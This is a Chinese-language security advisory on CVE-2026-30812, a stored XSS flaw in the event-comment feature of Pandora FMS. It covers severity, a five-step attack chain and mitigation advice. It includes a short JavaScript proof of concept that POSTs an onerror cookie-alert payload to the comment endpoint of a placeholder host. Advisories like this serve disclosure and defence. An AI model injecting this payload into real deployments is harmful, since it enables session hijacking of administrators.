IPBUF安全漏洞报告
English
CVE-2026-30812 CVSS 5.4 中危

CVE-2026-30812 Pandora FMS 存储型XSS漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-30812
漏洞类型
存储型XSS (Stored XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Pandora FMS

相关标签

XSSStored XSSPandora FMSCWE-79Web Security

漏洞概述

Pandora FMS在777至800版本中存在严重的输入验证缺陷。由于Web页面生成时未能正确中和输入,攻击者可通过“事件评论”功能注入恶意脚本。这是一个存储型跨站脚本(XSS)漏洞,CVSS评分为5.4(中危)。由于需要低权限且受害者需进行交互,攻击者可利用此漏洞窃取敏感信息或进行会话劫持,对系统的机密性和完整性造成低程度影响。

技术细节

该漏洞源于Pandora FMS在处理用户提交的“事件评论”时,缺乏有效的输入过滤和输出编码机制(CWE-79)。攻击者首先需要拥有一个低权限账户登录系统。随后,在添加事件评论的环节,攻击者可以构造包含恶意JavaScript代码的Payload。系统将这些未经验证的数据直接存储在数据库中。当管理员或其他具有更高权限的用户查看该事件评论的页面时,服务器会将存储的恶意脚本作为HTML响应的一部分返回给浏览器。由于浏览器无法区分合法内容与脚本代码,恶意脚本将在受害者的浏览器上下文中执行。根据CVSS向量(S:C),该攻击可能影响同一源下的其他应用,导致Cookie窃取、会话劫持或敏感数据泄露,从而破坏系统的机密性和完整性。

攻击链分析

STEP 1
1. 获取访问权限
攻击者注册或使用现有的低权限账户登录Pandora FMS系统。
STEP 2
2. 构造Payload
攻击者编写包含恶意JavaScript代码的XSS Payload。
STEP 3
3. 注入Payload
攻击者在“事件评论”功能中提交包含恶意Payload的评论,系统将其存储到数据库中。
STEP 4
4. 触发漏洞
当管理员或高权限用户访问并查看包含该评论的事件页面时,恶意脚本在浏览器中执行。
STEP 5
5. 执行攻击
脚本执行后,攻击者可窃取Session ID、重定向用户或执行其他客户端操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Proof of Concept for CVE-2026-30812 // Demonstrates Stored XSS via event comments in Pandora FMS // Target endpoint for adding comments (Example) let targetUrl = "https://vulnerable-pandora-fms.com/pandora_console/index.php?sec=eventos&sec2=operation/events/events"; // Malicious XSS Payload to be stored in the comment let payload = "<img src=x onerror=alert(document.cookie)>"; // Constructing the POST request data let params = new URLSearchParams(); params.append('page', 'operation/events/events'); params.append('action', 'add_comment'); params.append('id_event', '12345'); // Valid Event ID params.append('comment', payload); // Injected payload // Sending the request (Requires authenticated session cookie) fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: params }).then(response => { if (response.ok) { console.log('Payload injected successfully. Check the event log to trigger XSS.'); } }).catch(error => console.error('Error:', error));

影响范围

Pandora FMS >= 777, <= 800

防御指南

临时缓解措施
在官方补丁未发布或无法立即升级的情况下,建议管理员暂时禁用事件评论功能,或仅允许受信任的IP地址访问。同时,在服务器端实施严格的输入清理规则,过滤掉常见的XSS字符(如 <, >, ", ', javascript: 等)。用户应避免在登录状态下点击来源不明的链接或查看不可信的评论内容。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表